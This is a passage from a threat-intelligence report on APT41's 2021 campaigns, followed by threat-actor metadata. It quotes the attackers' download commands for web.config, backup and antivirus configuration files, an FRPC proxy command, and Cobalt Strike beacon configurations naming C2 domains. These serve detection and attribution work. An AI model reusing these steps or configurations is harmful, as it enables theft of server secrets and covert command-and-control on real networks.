C:\\Users\\Admin\\Desktop\\{redacted}\\远控\\exe\\dfss.dll upload\r\nC:\\Users\\Administrator\\Desktop\\BadPotatoNet4.exe\r\nProxy: Internal Proxy – T1090.001\r\nIn the attacks we analyzed, APT41 often used a tool for proxying traffic called FRPC.\r\nfrcp.exe -c frcp.ini\r\nExfiltration\r\nExfiltration Over C2 Channel – T1041\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 22 of 35\n\nAt the exfiltration stage, APT41 gained access to various server configurations, backup data, and\r\nuser data. The group most likely did not exfiltrate a large amount of confidential documents.\r\ndownload D:\\projects\\{redacted}\\web.config; download D:\\projects\\{redacted}\\css\\help.txt;\r\ndownload D:\\System Volume Information\\002.dat; download D:\\projects\\\r\n{redacted}\\Web.config; download D:\\{redacted}\\{redacted}20210301120008.txt; download\r\nc:\\ftpcmd.dat; download c:\\AppTextFile.txt; download\r\nc:\\Users\\Administrator\\Desktop\\OfcNTCer.dat; download c:\\Users\\\r\n{redacted}\\Desktop\\172.16.11.103.png; download c:\\Users\\{redacted}\\Desktop\\FTP\r\nbatch\\ftp_servername.bat; download c:\\Users\\{redacted}\\Desktop\\FTP batch\\[redacted].bat;\r\ndownload c:\\Users\\{redacted}\\Desktop\\tm remote chat.txt; download c:\\Temp\\netstat.txt;\r\ndownload c:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Admin\\web.config;\r\ndownload c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Admin\\Utility\\SQL\\web.config; download c:\\Program Files\r\n(x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Web\\web.config; download c:\\Program Files\r\n(x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Web_OSCE\\Web_console\\HTML\\widget_old\\repository\\inc\\class\r\n; download\r\nc:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config;\r\ndownload c:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config;\r\ndownload c:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\web.config;\r\ndownload c:\\Windows\\WinSxS\\amd64_clientdeployment-connectsite_31bf3856ad364e35_10.0.14393.0_none_d2443e4100c72a7c\\web.config;\r\ndownload c:\\Users\\{redacted}\\Desktop\\Office Scan Backup\\Private\\AosBackup.txt\r\nHunting for APT41 Cobalt Strike servers\r\nThis section explains how to hunt for APT41’s network infrastructure. The group usually uses\r\ncertain servers exclusively to host the Cobalt Strike framework, while they exploit others only for\r\nactive scanning through Acunetix. The Group-IB TI team identified servers that were used for both,\r\nhowever. It is important that all APT41 servers were protected using the cloud service CloudFlare,\r\nwhich hides the real server addresses. That said, the Group-IB Threat Intelligence system detects\r\nserver backends belonging to various threat actors, including APT41.\r\nAs a result, our clients are among the first to proactively block new servers belonging to threat\r\nactors.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 23 of 35\n\nTo identify APT41 infrastructure, it is essential to describe how Cobalt Strike operates.\r\nThis framework serves as an intermediate server to which threat actors can connect from other\r\ndevices. Other devices connect to the Cobalt Strike server (usually, but not always) on port 50050.\r\nBy default, the server generates a self-signed SSL certificate, which contains the “Cobalt Strike”\r\nstrings.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 24 of 35\n\nOne of the default Cobalt Strike certificates\r\nHowever, the servers used in these campaigns have different certificates on this port: the two\r\ncertificates below, with the values “fortawesome”, are unique and clearly indicate that this Cobalt\r\nStrike image belongs to APT41.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 25 of 35\n\nThe next major feature of Cobalt Strike that the Group-IB team discovered is the use of custom SSL\r\ncertificates on listeners. Listeners are used to accept connections from the payload in order to\r\nmaintain communication between bots and the C\u0026C server. The group uses SSL certificates for\r\nHTTPS listeners. In the examples below, APT41 used unique SSL certificates that mimicked\r\n“Microsoft”, “Facebook” and “CloudFlare”.\r\nAccording to Group-IB Threat Intelligence data, servers with such certificates first emerged in early\r\n2020. By the end of 2021, their number reached 106. This means that the Group-IB team discovered\r\nmore than 100 Cobalt Strike servers that are used only by APT41. Unsurprisingly, most are no longer\r\nactive.\r\nSSL-cert SHA1-8c93083440cd9ce5fe4cf58c3348bd85bdf07f6c\r\nSSL-cert SHA1-0cc907db409a259611f56abc7dead19c6ed51fd0\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 26 of 35\n\nArtifacts and other noteworthy findings\r\nChinese strings\r\nAn analysis conducted by Group-IB experts revealed the following key artifacts pointing to the\r\norigin of APT41:\r\n171.208.242.0/24 CHINANET 171.208.241.0/24 CHINANET 110.191.217.0/24 CHINANET\r\n102.223.72.0/22 SUNNETWORK-SA 103.165.84.0/24 GEM1-HK 178.79.128.0/18 US-LINODE-20100510 45.152.112.0/23 ALANYHQ 60.248.225.0/24 HINET-NET 61.221.57.0/24 HINET-NET\r\nUsing mainly Chinese IP addresses to communicate with Cobalt Strike servers.\r\nUsing Chinese characters on the devices from which the attacks were conducted.\r\nUsing a specific Pinyin format for directory names.\r\nPinyin is a romanization system that represents the sounds of the Chinese language through\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 27 of 35\n\n“Working” hours” of APT41\r\nResearch into APT41 malware campaigns dated 2021 helped align all the group’s timestamps to\r\nUTC+8. As a result, we have come to the following conclusions. The group starts working at 9 AM\r\nand its activity stops around 7 PM. It is clear that APT41 members do not work long hours, unlike\r\nfinancially motivated hacker groups like Conti, for example. Groups like Conti tirelessly “work” 14\r\nhours a day without any days off, which we described in detail in our report titled “CONTI ARMADA:\r\nTHE ARMATTACK CAMPAIGN”.\r\nAccording to this map, the following countries are located in this time zone:\r\nthe use of the Latin alphabet. In the case below, a directory is called “yuming”, which in Chinese\r\nmeans “domain name”.\r\nSeparate directories are used for certain organizations.\r\nRussia\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 28 of 35\n\nConclusion\r\nFor a long time, security researchers believed that hacked legitimate pentesting and red teaming\r\ntools, which are widely used by hacker groups, make threat hunting and attribution more difficult.\r\nAmong such tools, Cobalt Strike stands out. In the past, the tool was appreciated by cybercriminal\r\ngangs targeting banks, while today it is popular among various threat actors regardless of their\r\nmotivation, including infamous ransomware operators. That is why it is essential to proactively\r\ndiscover servers running this framework and to attribute those servers to specific threat actors. It is\r\na crucial task for all cybersecurity teams that want to prevent attacks.\r\nAustralia\r\nMalaysia\r\nSingapore\r\nChina\r\nand others\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 29 of 35\n\nIn this blog post, we shared examples of identifying and correlating Cobalt Strike with campaigns\r\nconducted by the state-sponsored group APT41. Thanks to our proprietary Group-IB Threat\r\nIntelligence system, which detects and attributes such attacks automatically, our clients are the first\r\nto be informed about cyberthreats, including all the relevant indicators of compromise and TTPs.\r\nThey are also the first to obtain the names of compromised organizations, which helps them avoid\r\nsupply-chain attacks and make their network infrastructure more secure.\r\nIn line with Group-IB’s mission of fighting cybercrime, we will continue to explore the methods, tools,\r\nand tactics used by one of the oldest and still dangerous groups, APT41. We will also continue to\r\ninform and warn targeted organizations worldwide. We always strive to ensure that organizations\r\nunder attack are notified as quickly as possible to help reduce potential damage. We also consider it\r\nour responsibility to share our findings with the cybersecurity community and encourage\r\nresearchers to study advanced threats, share data, and use our technologies to combat cybercrime\r\n— together.\r\nIf you are interested in what we do and would like to become an expert in the same field, you can\r\ntake our Digital Forensics, Incident Response, and Threat Intelligence training courses. We also\r\nwelcome applications to join the Group-IB team. Please check our vacancies on the website.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 30 of 35\n\nTry Group-IB Threat Intelligence now!\r\nOptimize strategic, operational and tactical decision-making with best-in-class cyber\r\nthreat analytics\r\nIOCs\r\nIP\r\nFirst\r\nseen\r\nLast\r\nseen\r\nC\u0026C domains\r\n45.142.214[.]242\r\n2021-\r\n04-12\r\n2021-\r\n07-\r\n08\r\ndelaylink[.]tk,javaupdate.biguserup[.]workers.dev\r\n45.153.231[.]31\r\n2021-\r\n05-31\r\n2021-\r\n06-\r\n26\r\n45.144.31[.]31\r\n2021-\r\n06-\r\n04\r\n2021-\r\n06-\r\n26\r\ncolunm[.]tk\r\n45.142.214[.]56\r\n2021-\r\n06-\r\n09\r\n2021-\r\n07-\r\n20\r\nmute-pond-371d.zalocdn[.]workers.dev,cs16.dns04[.]com\r\n2021- gentle-voice-Cobalt Strike Beacons\r\nTest Drive Group-IB Threat Intelligence\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 31 of 35\n\n45.142.214.242: \"config_payload\": { \"process-inject-stub\": \"fbM7aRSiLoJ01wyIz1ATTQ==\",\r\n\"http-get.uri\": \"javaupdate.biguserup.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1,\r\n\"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k\r\nnetsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\",\r\n\"watermark\": 305419896, \"process-inject-use-rwx\": 64, \"dns_idle\": 134744072, \"sleeptime\":\r\n60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCY/kAU3i5Cw6hXsXbgonByGxgt0JX\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*2Referer:\r\nhttps://javaupdate.biguserup.workers.dev/Accept-Encoding: *\u0026Host:\r\njavaupdate.biguserup.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"531c720aae6e053b9db9be8e7b56f78f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41,\r\n\"cookieBeacon\": 1, \"port\": 443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *\u0026Host: javaupdate.biguserup.workers.devAccept: */*2Referer:\r\nhttps://javaupdate.biguserup.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\",\r\n\"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0)\r\nGecko/20100101 Firefox/57.0\" } },\r\n45.144.31.31: config_payload\": { \"process-inject-stub\": \"d5nX4wNnwCo18Wx3jr4tPg==\", \"http-get.uri\": \"cs.colunm.tk,/__utm.gif\", \"http-get.server.output\": \"\", \"post-ex.spawnto_x64\":\r\n\"%windir%\\\\sysnative\\\\rundll32.exe\", \"post-ex.spawnto_x86\":\r\n\"%windir%\\\\syswow64\\\\rundll32.exe\", \"watermark\": 305419896, \"process-inject-use-rwx\": 64,\r\n\"sleeptime\": 60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCBkyCWDMC1Q6VqRZIY35+iU7KtrHy\r\n\"maxdns\": 255, \"http-post.client\": \"\u0026Content-Type: application/octet-streamid\", \"ssl\": true,\r\n\"publickey_md5\": \"9cdb3fca6156c6cbed2f01d6431b3dfb\", \"http-post.uri\": \"/submit.php\",\r\n\"cookieBeacon\": 1, \"port\": 8443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Cookie\",\r\n\"http-get.verb\": \"GET\", \"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (compatible; MSIE 9.0;\r\nWindows NT 6.1; WOW64; Trident/5.0; MANM; MANM)\" }\r\n45.142.212.47: \"config_payload\": { \"process-inject-stub\": \"9LoFKCrbYlLergvfu7Ki8A==\", \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k\r\nnetsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"process-inject-use-rwx\": 64, \"dns_idle\": 134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3WFlrP6k0u+i8ozfzb2lLZHkTokxc3l8\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"a9020b0e5342fb8877d2fb213802132f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41,\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 32 of 35\n\n\"cookieBeacon\": 1, \"port\": 443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36\r\n(KHTML, like Gecko) Version/4.0\" } },\r\n185.250.150.22: \"config_payload\": { \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\",\r\n\"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"process-inject-use-rwx\":\r\n64, \"dns_idle\": 134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCQ2/teGq2eUgU2sZjiJCCcKH7RgQrs\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"398c270c67cd915134ebbf7108090789\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41,\r\n\"cookieBeacon\": 1, \"port\": 443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36\r\n(KHTML, like Gecko) Version/4.0\" }\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 33 of 35\n\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nSubscription plans Services Resource Center\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 34 of 35\n\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 35 of 35", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.group-ib.com/blog/apt41-world-tour-2021/" ], "report_names": [ "apt41-world-tour-2021" ], "threat_actors": [ { "id": "aada2650-7bef-45e4-8371-18c4318a7056", "created_at": "2022-10-25T15:50:23.422502Z", "updated_at": "2026-04-10T02:00:05.278662Z", "deleted_at": null, "main_name": "Suckfly", "aliases": [ "Suckfly" ], "source_name": "MITRE:Suckfly", "tools": [ "Nidiran" ], "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "a4a3c2a4-992d-4ce6-8c97-e39b23da9a26", "created_at": "2022-10-25T16:07:24.242051Z", "updated_at": "2026-04-10T02:00:04.909353Z", "deleted_at": null, "main_name": "Suckfly", "aliases": [ "G0039" ], "source_name": "ETDA:Suckfly", "tools": [ "Backdoor.Nidiran", "Nidiran", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "gsecdump", "smbscan" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "7b039cc0-33b6-495a-b4ca-649d096b993d", "created_at": "2023-01-06T13:46:38.482654Z", "updated_at": "2026-04-10T02:00:02.99265Z", "deleted_at": null, "main_name": "APT22", "aliases": [ "G0039", "Suckfly", "BRONZE OLIVE", "Group 46" ], "source_name": "MISPGALAXY:APT22", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "273a41a8-5115-4f55-865f-0960a765f18c", "created_at": "2022-10-25T16:07:24.397947Z", "updated_at": "2026-04-10T02:00:04.974605Z", "deleted_at": null, "main_name": "Wicked Spider", "aliases": [ "APT 22", "Bronze Export", "Bronze Olive", "Wicked Spider" ], "source_name": "ETDA:Wicked Spider", "tools": [ "Agent.dhwf", "AngryRebel", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EternalBlue", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "PCRat", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "00e7a6ed-1880-4391-b0b9-1f46fae0e5cc", "created_at": "2025-08-07T02:03:24.591024Z", "updated_at": "2026-04-10T02:00:03.717645Z", "deleted_at": null, "main_name": "BRONZE EXPORT", "aliases": [ "TG-3279 ", "Wicked Spider " ], "source_name": "Secureworks:BRONZE EXPORT", "tools": [ "Conpee", "PlugX", "PwDump" ], "source_id": "Secureworks", "reports": null }, { "id": "1d63fba2-f042-41ca-8a72-64c6e737d295", "created_at": "2025-08-07T02:03:24.643647Z", "updated_at": "2026-04-10T02:00:03.719558Z", "deleted_at": null, "main_name": "BRONZE OLIVE", "aliases": [ "APT22 ", "Barista", "Group 46 ", "Suckfly " ], "source_name": "Secureworks:BRONZE OLIVE", "tools": [ "Angryrebel", "DestroyRAT", "PlugX" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775490773, "ts_updated_at": 1775791947, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b8c8f7882ae6d87fb4652b6fbae63e6119856445.pdf", "text": "https://archive.orkl.eu/b8c8f7882ae6d87fb4652b6fbae63e6119856445.txt", "img": "https://archive.orkl.eu/b8c8f7882ae6d87fb4652b6fbae63e6119856445.jpg" } }